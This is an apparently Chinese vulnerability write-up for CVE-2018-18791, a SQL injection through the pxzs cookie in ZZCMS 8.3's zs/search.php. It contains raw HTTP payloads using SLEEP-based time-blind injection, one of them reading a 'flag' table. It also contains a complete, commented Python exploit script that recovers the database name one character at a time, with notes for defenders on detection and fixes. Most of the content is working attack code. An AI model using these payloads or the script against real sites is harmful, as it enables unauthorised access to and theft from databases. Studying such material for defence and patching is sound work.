zzcms8.3注入 (CVE-2018-18791)
概述
站长招商网内容管理系统简称 ZZCMS,由ZZCMS团队开发,融入数据库优化、内容缓存、AJAX等技术,使网站的安全性、稳定性、负载能力得到可靠保障。源码开放,功能模块独立,便于二次开发。zzcms8.3的zs/search.php中,Cookie的pxzs参数存在SQL注入漏洞。
影响范围
POC
判断长度
GET /zs/search.php HTTP/1.1
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Cookie: pxzs=(SELECT(1)FROM(SELECT(SLEEP((3-length(database()))=1)))abcd)
pxzs=(SELECT(1)FROM(SELECT(SLEEP((103-(select conv(hex(mid((select flag from flag),1,1)),16,10)))=1)))abcd)
python3 POC
#!/usr/local/bin/python3
# -*-coding:utf-8-*-
 
import requests
import time
def zs_sqli(host: str) -> None:
    """Time-based blind SQL injection probe for zzcms 8.3 (CVE-2018-18791).

    Sends GET requests to ``http://<host>/zs/search.php`` with a crafted
    ``pxzs`` cookie and treats a response that takes longer than one second
    as a "true" answer from the injected ``SLEEP``. It first finds the
    length of ``database()`` and then recovers the name one character at a
    time, printing progress as it goes. Nothing is returned.

    Defender notes: the observable signature is a ``pxzs`` cookie containing
    ``SELECT``/``SLEEP`` plus a burst of requests to the same URL whose
    response times cluster around the sleep duration. Treating the cookie
    as untrusted input and passing it through a parameterised query removes
    the injection; a WAF rule on SQL keywords in cookie values gives
    detection in the meantime.

    Args:
        host: hostname or IP (optionally with port) used both for the URL
            and for the ``Host`` header.
    """
    # Candidate alphabet tried at every position; note it contains no
    # uppercase letters, so a mixed-case name would come back incomplete.
    payloads = '-.@_abcdefghijklmnopqrstuvwxyz0123456789{}'
    
    result = ""
    headers = {"Host": host,
               "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
               "Accept-Encoding": "gzip, deflate",
               "Connection": "keep-alive",
               }
    # Placeholder session cookies; only "pxzs" (set below) carries the payload.
    cookies = {"bdshare_firstime":"", "PHPSESSID":"", "UserName":"", "PassWord":""}
    url = "http://%s/zs/search.php" % host
    #proxies = {"http":"http://127.0.0.1:8080"}
    # Empty string is falsy, so requests sends without a proxy; the commented
    # line above shows how to route through a local intercepting proxy.
    proxies = ""
    rlen = 0
    print("Start\n")
    # Phase 1: length of database(). The injected expression evaluates to
    # SLEEP(1) only when (i - length) == 1, so the first slow response
    # arrives at i == length + 1 and rlen is set to i - 1.
    # If no request exceeds 1 s (e.g. the host is not vulnerable) rlen stays
    # 0 and the character loop below is skipped silently.
    for i in range(1,100):
        pxzs = "(SELECT(1)FROM(SELECT(SLEEP((%d-length(database()))=1)))abcd)" %i
        cookies["pxzs"] = pxzs
        starttime = time.time()
        res = requests.get(url, headers=headers, cookies=cookies, proxies=proxies)  # response body is not inspected; timing only
        # Threshold of 1 s equals the SLEEP duration, so network latency is
        # what pushes a true answer over the line — a very fast link could
        # in principle miss it.
        if time.time() - starttime > 1:
            rlen = i - 1
            print("the length of current database is : %d\n" %rlen)
            break
    # Phase 2: one character per position. char is ord(candidate) + 1, so
    # the SLEEP fires exactly when the decimal value of the character at
    # position j equals ord(candidate).
    for j in range(1, rlen+1):
        for payload in payloads:
            char = ord(payload) + 1
            starttime = time.time()
            pxzs = "(SELECT(1)FROM(SELECT(SLEEP((%d-(select conv(hex(mid(database(),%d,1)),16,10)))=1)))abcd)" %(char, j)
            cookies["pxzs"] = pxzs
            res = requests.get(url, headers=headers, cookies=cookies, proxies=proxies)  # timing only, body unused
            if time.time() - starttime > 1:
                result += payload
                print('current database is:', result)
                break
            else:
                pass  # no-op: a non-matching candidate simply moves on
        # If no candidate matched (character outside `payloads`, or a
        # timing glitch), nothing is appended and this position is lost
        # without any indication; `result` then ends up shorter than rlen.
    print('\n[Finally] current database is %s' % result)
if __name__ == '__main__':
    # Example host from the original write-up (RFC 1918 private address);
    # the page gives no real target.
    host = '172.18.1.1'
    zs_sqli(host)